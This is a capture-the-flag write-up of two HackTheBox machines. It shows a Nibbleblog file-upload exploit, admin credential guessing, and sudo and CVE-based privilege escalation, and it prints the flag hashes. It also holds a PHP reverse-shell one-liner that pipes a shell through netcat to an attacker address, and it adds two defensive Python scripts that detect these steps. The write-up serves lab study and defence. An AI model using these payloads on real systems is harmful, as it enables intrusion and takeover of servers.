some vulnerable machines on HackTheBox
Written by: Jan Fok
First, I ran an nmap scan on the top 1000 ports on the system. We can see that there is an OpenSSH service running on port 22 and an Apache HTTP server running on port 80.
Using common HTTP scripts from Nmap Scripting Engine (NSE) does not yield anything useful.
Using whatweb, we can check what web applications are in use on the server. When I access the web page in a web browser, I see an empty page with the words “Hello World!”. Looking at the source code, there is a comment indicating the existence of a directory called /nibbleblog/.
Using whatweb on the nibbleblog directory, we can see the technologies in use, which include HTML5, jQuery, PHP and Nibbleblog.
A Google search for “nibbleblog exploits” yields a Nibbleblog File Upload Vulnerability. This flaw allows an authenticated attacker to upload and execute PHP code.
The Metasploit version of the exploit was tested on version 4.0.3. However, we still don’t know what version of Nibbleblog is running on our target.
Looking at the source code of the Metasploit module, we can see that it requires a username and password to authenticate to the admin portal, which is found at admin.php.
Next, I used gobuster to enumerate the available directories using dirbuster's common wordlist. The results return 11 entries, which include admin.php, /content and /README.
Curling the README page shows us that the version of Nibbleblog running on the target is indeed v4.0.3. I now have confirmation that the web server is vulnerable to the exploit we have found.
Next, I need valid credentials to start the exploit. Looking through the “content” folder, we find a file called “users.xml” under a nested folder labelled “private”. Using the following command, we can obtain the XML data in our terminal:
curl http://[IP]/nibbleblog/content/private/users.xml | xmllint --format -
The file shows us that admin is indeed a valid username.
Next, we looked at the config.xml file. There are two mentions of nibbles in this file. According to HackTheBox, it is not uncommon to crack a password hash using a wordlist generated by crawling and scraping the website.
Using the credentials admin:nibbles, we were able to obtain access to the admin portal.
Now that we have identified an exploit that would work on the target and we have valid credentials, we can begin with our exploitation.
Looking around the admin portal, we find that we are able to upload files under the upload image plugin. We then tested this by uploading a PHP script with some valid PHP code which returns the ID of the user.
<?php system('id'); ?>
After uploading the file, we get a bunch of error messages, which nevertheless indicate that the file was uploaded successfully to the server. Next, we went back into the /content folder and found a nested file called image.PHP. Opening this file, we can see the id of the user printed inside.
This indicates that we successfully obtained remote code execution (RCE). Next, we will update our code to upload a reverse shell back to our machine. We obtained the following code from PayloadsAllTheThings.
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Local IP] [Local Port] >/tmp/f'); ?>
I then used netcat to open a listening port on our machine to receive the reverse shell.
Uploading the reverse shell script onto the server and accessing the “image.php” file once again, I was able to obtain a reverse shell on my local machine.
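Seen from the defender's side, the three steps above (reading the private XML files, posting through the admin panel, then requesting a PHP file under /content) all leave traces in the Apache access log, and PHP should never execute from a content or upload directory at all. The following Python script is an added example, not part of the original write-up: it parses constructed combined-format log lines (the plugin path under /content and the admin.php query string are illustrative, not taken from the target) and raises a finding for each of those traces, upgrading a PHP hit under /content to an upload-then-execute chain when the same client posted to admin.php earlier.

```python
import re

# Constructed Apache "combined" access-log lines; the plugin path under /content is illustrative.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /nibbleblog/ HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:07 +0000] "GET /nibbleblog/content/private/users.xml HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "GET /nibbleblog/content/private/config.xml HTTP/1.1" 200 1402 "-" "curl/7.68.0"
10.10.14.5 - - [01/Jan/2024:10:01:30 +0000] "POST /nibbleblog/admin.php?controller=plugins&action=config HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:01:41 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 61 "-" "Mozilla/5.0"
10.10.14.9 - - [01/Jan/2024:10:02:00 +0000] "GET /nibbleblog/content/public/upload/photo.jpg HTTP/1.1" 200 88231 "-" "Mozilla/5.0"
"""

# ip, two ident/user fields, timestamp, request line, status code (the rest of the line is ignored)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
PRIVATE_XML = re.compile(r"^/nibbleblog/content/private/[^/]+\.xml$")
CONTENT_PHP = re.compile(r"^/nibbleblog/content/.+\.php\d?$", re.IGNORECASE)  # also catches image.PHP
ADMIN_PANEL = "/nibbleblog/admin.php"


def parse_line(line):
    """Split one combined-format line into its fields, or return None for unparsable input."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # compare on the path, not the query string
    rec["status"] = int(rec["status"])
    return rec


def detect(lines):
    """Return one finding per suspicious request, correlating admin POSTs with later PHP hits."""
    findings = []
    admin_writers = set()  # client IPs that have posted to the admin panel so far
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if rec["method"] == "POST" and path == ADMIN_PANEL:
            admin_writers.add(ip)
        # private/ holds users.xml and config.xml; a 200 here means the web server is serving them
        if rec["status"] == 200 and PRIVATE_XML.match(path):
            findings.append({"rule": "private-xml-exposed", "ip": ip, "path": path})
        # any .php served from the content tree is wrong; after an admin POST it is a webshell drop
        if CONTENT_PHP.match(path):
            rule = "upload-then-execute" if ip in admin_writers else "php-in-content-dir"
            findings.append({"rule": rule, "ip": ip, "path": path})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG.splitlines()):
        print(f"{f['rule']:22} {f['ip']:12} {f['path']}")
```

The two findings on the XML files point at the root cause rather than the attacker: the content/private directory should be denied to web clients (or moved out of the document root), and the PHP handler should be disabled for the whole content tree so that an uploaded file can at most be downloaded, never executed.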
I was able to obtain the user flag from the home directory.
79c03865431abf47b90ef24b9695e148
Next, I will try to escalate privileges to root. There is a zip file labelled personal.zip in the home directory. Unzipping the file, we find a file called monitor.sh inside it.
We next uploaded a LinEnum.sh script, which enumerates a Linux machine locally. This was done using a Python web server on our local machine and curling the file from the target.
We then ran the script, and from the results of the enumeration we can see that we have sudo access to run the monitor.sh file without requiring a password.
We can then append a one-line reverse shell script to the monitor.sh file and run the file using sudo to obtain a reverse shell on our machine.
Once we receive the reverse shell, I was able to obtain the root flag from the root directory.
de5e5d6619862a8aa5b9b212314e0cdd
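The root step above works only because a NOPASSWD sudo rule points at a script the low-privileged user can edit. That combination is easy to audit before an attacker finds it. The Python script below is an added example, not part of the original write-up: it parses sudoers-style rules, and for every NOPASSWD command checks from the mode bits whether the target file (or the directory holding it, which would allow the file to be replaced) is writable by a given uid and group set. The demo builds a throwaway directory with two constructed scripts, one of them world-writable; the user name nibbler and the script names are illustrative.

```python
import os
import re
import stat
import tempfile

# One sudoers rule per line:  user  host = (runas)  [NOPASSWD:]  cmd[, cmd ...]
SUDO_RE = re.compile(r"^(\S+)\s+([^=\s]+)\s*=\s*(?:\(([^)]*)\)\s*)?(NOPASSWD:\s*)?(.+)$")


def writable_by(path, uid, gids):
    """True if uid (holding the groups in gids) can write path, judged from mode bits only."""
    st = os.stat(path)
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def audit_sudoers(sudoers_text, uid, gids):
    """Report NOPASSWD rules whose target the unprivileged user could rewrite or replace."""
    findings = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = SUDO_RE.match(line)
        if m is None or m.group(4) is None:  # no NOPASSWD tag: a password is still required
            continue
        for cmd in m.group(5).split(","):
            target = cmd.strip().split()[0]  # drop any argument restrictions, keep the binary
            if target == "ALL":
                findings.append({"rule": line, "target": target, "reason": "unrestricted command"})
                continue
            if not os.path.exists(target):
                continue
            if writable_by(target, uid, gids):
                findings.append({"rule": line, "target": target, "reason": "target file writable"})
            elif writable_by(os.path.dirname(target), uid, gids):
                findings.append({"rule": line, "target": target, "reason": "parent directory writable"})
    return findings


def demo():
    """Constructed scenario: two scripts granted via NOPASSWD, one of them world-writable."""
    home = tempfile.mkdtemp(prefix="nibbler-")  # stands in for the user's home directory (mode 0700)
    loose = os.path.join(home, "monitor.sh")
    tight = os.path.join(home, "backup.sh")
    for p in (loose, tight):
        with open(p, "w") as f:
            f.write("#!/bin/bash\necho monitoring\n")
    os.chmod(loose, 0o777)  # anyone can edit what root will run
    os.chmod(tight, 0o755)
    sudoers = (f"nibbler ALL=(root) NOPASSWD: {loose}, {tight}\n"
               f"nibbler ALL=(root) {loose}\n")  # same script, but a password is required
    # Evaluate as a hypothetical account that owns neither file and shares no group with them
    return audit_sudoers(sudoers, uid=os.getuid() + 1, gids=set())


if __name__ == "__main__":
    for f in demo():
        print(f"{f['reason']:26} {f['target']}")
```

On a real host the same function can be fed the output of visudo -c -f or the relevant /etc/sudoers.d fragments, with the uid and groups of the account being reviewed; the fix for a hit is to make the script root-owned and non-writable, or to drop the NOPASSWD tag.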
Running an nmap scan on the top 1000 ports with default scripts turned on, I discover that there is an OpenSSH server running on port 22 and an Apache server v2.4.41 running on port 80. The target is running Ubuntu Linux Focal Fossa 20.04.
Using the http-enum script with our scan on port 80, I can see that there is a robots.txt file in the web directory.
Next, I used gobuster to enumerate the directories on the web server. The results show that there are the directories “/admin”, “/robots.txt”, “/plugins”, “/theme” and “/data” on the web server.
Looking at the robots.txt file, we see that the directory /admin/ is disallowed from being crawled.
Looking at the admin portal, I tried the credentials admin:admin and managed to gain access.
I can then see that the webpage uses GetSimple CMS version 3.3.15.
After a quick Google search for “GetSimple exploits”, I found that there is an XSS vulnerability for GetSimple versions 3.3.15 and older. I also found out that the exploit was readily available in Metasploit. Using the Metasploit module, I was able to obtain a reverse shell on the machine and obtained the user flag.
7002d65b149b0a4d19132a66feed21d8
I uploaded a LinPEAS.sh script to the target’s /var/www/html directory to enumerate any privilege escalation vectors.
The results of the script tell us that the machine is vulnerable to two CVEs:
I looked for the CVEs in Metasploit and found that they were both available as modules. However, neither would work on the target machine. Then I tried looking for publicly available proofs of concept (PoCs), but most of them were written in C and the target did not have gcc or clang installed. However, I did realise that the target had python3 installed, so I found a PoC written in python3 and ran the script on the target to obtain root privileges.
f1fba6e9f71efb2630e6e34da6387842
Here, I tried to obtain the webshell without using the Metasploit module.
Doing some research on the GetSimple CMS exploit, I found a report online that described a vulnerability in the website’s theme-edit.php file, which does not sanitize user input. This allows for arbitrary code execution. I uploaded a PHP reverse shell script through the page and obtained a reverse shell on my local machine.